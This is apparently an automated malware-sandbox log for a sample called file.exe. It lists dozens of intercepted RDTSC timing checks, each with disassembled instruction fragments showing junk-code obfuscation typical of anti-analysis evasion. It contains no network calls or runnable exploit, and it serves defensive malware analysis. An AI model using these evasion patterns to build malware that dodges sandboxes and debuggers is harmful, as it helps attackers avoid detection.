Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72FC06 second address: 72FC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F36EC8543C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72FCFD second address: 72FD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72FD83 second address: 72FD87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72FD87 second address: 72FD8D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7304D4 second address: 7304D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7305BF second address: 7305CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7305CA second address: 7305D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7305D0 second address: 7305D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7305D5 second address: 7305DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73082B second address: 730839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F36ED361E0Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 731597 second address: 73159D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 731E68 second address: 731E6E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73159D second address: 7315A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 731E6E second address: 731E73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73329F second address: 7332FE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F36EC8543C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F36EC8543CEh 0x00000012 jmp 00007F36EC8543CDh 0x00000017 popad 0x00000018 pop eax 0x00000019 nop 0x0000001a sub si, 4185h 0x0000001f push 00000000h 0x00000021 mov edi, edx 0x00000023 push 00000000h 0x00000025 movzx esi, dx 0x00000028 xchg eax, ebx 0x00000029 jmp 00007F36EC8543D4h 0x0000002e push eax 0x0000002f jnp 00007F36EC8543D4h 0x00000035 push eax 0x00000036 push edx 0x00000037 ja 00007F36EC8543C6h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 734956 second address: 7349C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D2047h] 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F36ED361E08h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F36ED361E08h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D2310h] 0x0000004b xchg eax, ebx 0x0000004c jmp 00007F36ED361E13h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 pop edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7349C7 second address: 7349CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7351C0 second address: 7351C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7369FA second address: 736A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543CFh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, edx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F36EC8543C8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D2EC3h], ecx 0x00000031 push 00000000h 0x00000033 mov dword ptr [ebp+12479BD4h], eax 0x00000039 push eax 0x0000003a pushad 0x0000003b pushad 0x0000003c jmp 00007F36EC8543CFh 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7351C6 second address: 7351CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7374D8 second address: 7374DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7372B6 second address: 7372C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36ED361E0Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7372C4 second address: 7372F0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F36EC8543C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007F36EC8543E4h 0x00000013 pushad 0x00000014 jmp 00007F36EC8543D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73AE30 second address: 73AE44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F36ED361E06h 0x0000000e jno 00007F36ED361E06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73AE44 second address: 73AE4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73AE4A second address: 73AE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jl 00007F36ED361E06h 0x0000000f jmp 00007F36ED361E0Eh 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F36ED361E0Ch 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73AE76 second address: 73AE88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F36EC8543C6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73AE88 second address: 73AE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73B78B second address: 73B7AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73C6D7 second address: 73C6DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73B7AC second address: 73B7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73D413 second address: 73D45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F36ED361E08h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000016h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 xor bx, 7A51h 0x00000025 mov edi, 5A18C6DBh 0x0000002a push 00000000h 0x0000002c sub dword ptr [ebp+122D1CF0h], eax 0x00000032 push 00000000h 0x00000034 mov ebx, dword ptr [ebp+122D2AD3h] 0x0000003a xchg eax, esi 0x0000003b je 00007F36ED361E14h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73D45C second address: 73D460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E2DE second address: 73E388 instructions: 0x00000000 rdtsc 0x00000002 js 00007F36ED361E0Ch 0x00000008 jg 00007F36ED361E06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F36ED361E08h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d jmp 00007F36ED361E18h 0x00000032 pushad 0x00000033 mov dword ptr [ebp+122D1865h], edi 0x00000039 and ebx, 261E3F9Eh 0x0000003f popad 0x00000040 jns 00007F36ED361E0Ch 0x00000046 push 00000000h 0x00000048 or dword ptr [ebp+12455D2Eh], edi 0x0000004e push 00000000h 0x00000050 mov dword ptr [ebp+12472298h], eax 0x00000056 pushad 0x00000057 jnl 00007F36ED361E0Ch 0x0000005d popad 0x0000005e xchg eax, esi 0x0000005f jmp 00007F36ED361E14h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F36ED361E11h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F33D second address: 73F389 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F36EC8543CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, esi 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D2937h] 0x00000017 jp 00007F36EC8543CBh 0x0000001d adc bx, 3898h 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+12455BACh], eax 0x0000002a xchg eax, esi 0x0000002b jmp 00007F36EC8543CCh 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jo 00007F36EC8543CCh 0x00000039 jo 00007F36EC8543C6h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E4F6 second address: 73E503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F36ED361E06h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F389 second address: 73F38E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E503 second address: 73E52C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F36ED361E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F36ED361E1Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E52C second address: 73E531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E531 second address: 73E537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E537 second address: 73E5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub ebx, 0CB0E7A4h 0x0000000e jbe 00007F36EC8543C8h 0x00000014 push dword ptr fs:[00000000h] 0x0000001b stc 0x0000001c jmp 00007F36EC8543D2h 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F36EC8543C8h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 movzx ebx, ax 0x00000045 push eax 0x00000046 mov dword ptr [ebp+122D1A4Eh], esi 0x0000004c pop edi 0x0000004d mov eax, dword ptr [ebp+122D0DC5h] 0x00000053 push 00000000h 0x00000055 push esi 0x00000056 call 00007F36EC8543C8h 0x0000005b pop esi 0x0000005c mov dword ptr [esp+04h], esi 0x00000060 add dword ptr [esp+04h], 00000014h 0x00000068 inc esi 0x00000069 push esi 0x0000006a ret 0x0000006b pop esi 0x0000006c ret 0x0000006d mov edi, edx 0x0000006f push FFFFFFFFh 0x00000071 add ebx, 47071085h 0x00000077 adc bx, D7B1h 0x0000007c push eax 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F36EC8543D1h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7411F8 second address: 7411FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7411FE second address: 741215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36EC8543D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 745030 second address: 745043 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F36ED361E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jp 00007F36ED361E06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746078 second address: 74607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74607E second address: 7460D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, edx 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F36ED361E08h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F36ED361E08h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 push eax 0x00000043 pushad 0x00000044 pushad 0x00000045 jns 00007F36ED361E06h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74235A second address: 742388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F36EC8543D2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7451FF second address: 745206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7452C1 second address: 7452DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36EC8543D9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7452DF second address: 7452F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jng 00007F36ED361E06h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 743267 second address: 74326D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746FE7 second address: 746FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742388 second address: 742411 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F36EC8543C8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F36EC8543C8h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 stc 0x00000045 call 00007F36EC8543CDh 0x0000004a cld 0x0000004b pop ebx 0x0000004c mov dword ptr fs:[00000000h], esp 0x00000053 movzx edi, dx 0x00000056 mov eax, dword ptr [ebp+122D04ADh] 0x0000005c movsx edi, dx 0x0000005f push FFFFFFFFh 0x00000061 mov ebx, dword ptr [ebp+122D24ADh] 0x00000067 push eax 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746FEE second address: 747002 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F36ED361E08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742411 second address: 742415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747002 second address: 747007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747007 second address: 747085 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F36EC8543C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F36EC8543C8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 add di, 2E62h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F36EC8543C8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov edi, eax 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007F36EC8543C8h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 0000001Bh 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 push eax 0x00000065 push esi 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747085 second address: 747089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 748030 second address: 748035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74917D second address: 7491FC instructions: 0x00000000 rdtsc 0x00000002 je 00007F36ED361E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jmp 00007F36ED361E16h 0x00000011 nop 0x00000012 mov edi, esi 0x00000014 mov bl, ch 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F36ED361E08h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 mov bx, 89B6h 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 pushad 0x00000043 mov di, ax 0x00000046 mov dword ptr [ebp+12455C0Dh], esi 0x0000004c popad 0x0000004d mov eax, dword ptr [ebp+122D0189h] 0x00000053 add dword ptr [ebp+122D246Dh], edi 0x00000059 push FFFFFFFFh 0x0000005b jbe 00007F36ED361E0Bh 0x00000061 and di, 136Ah 0x00000066 push eax 0x00000067 push edi 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B506 second address: 74B523 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F36EC8543CCh 0x0000000c popad 0x0000000d push eax 0x0000000e ja 00007F36EC8543CEh 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F3E7 second address: 74F3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F3F0 second address: 74F3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F3F4 second address: 74F413 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F36ED361E0Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F413 second address: 74F436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F36EC8543C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E42F6 second address: 6E42FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E42FA second address: 6E42FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E42FE second address: 6E4306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E4306 second address: 6E430E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F34EC second address: 6F34F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752DC6 second address: 752DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F36EC8543CEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752F14 second address: 752F27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a ja 00007F36ED361E06h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75790C second address: 757913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
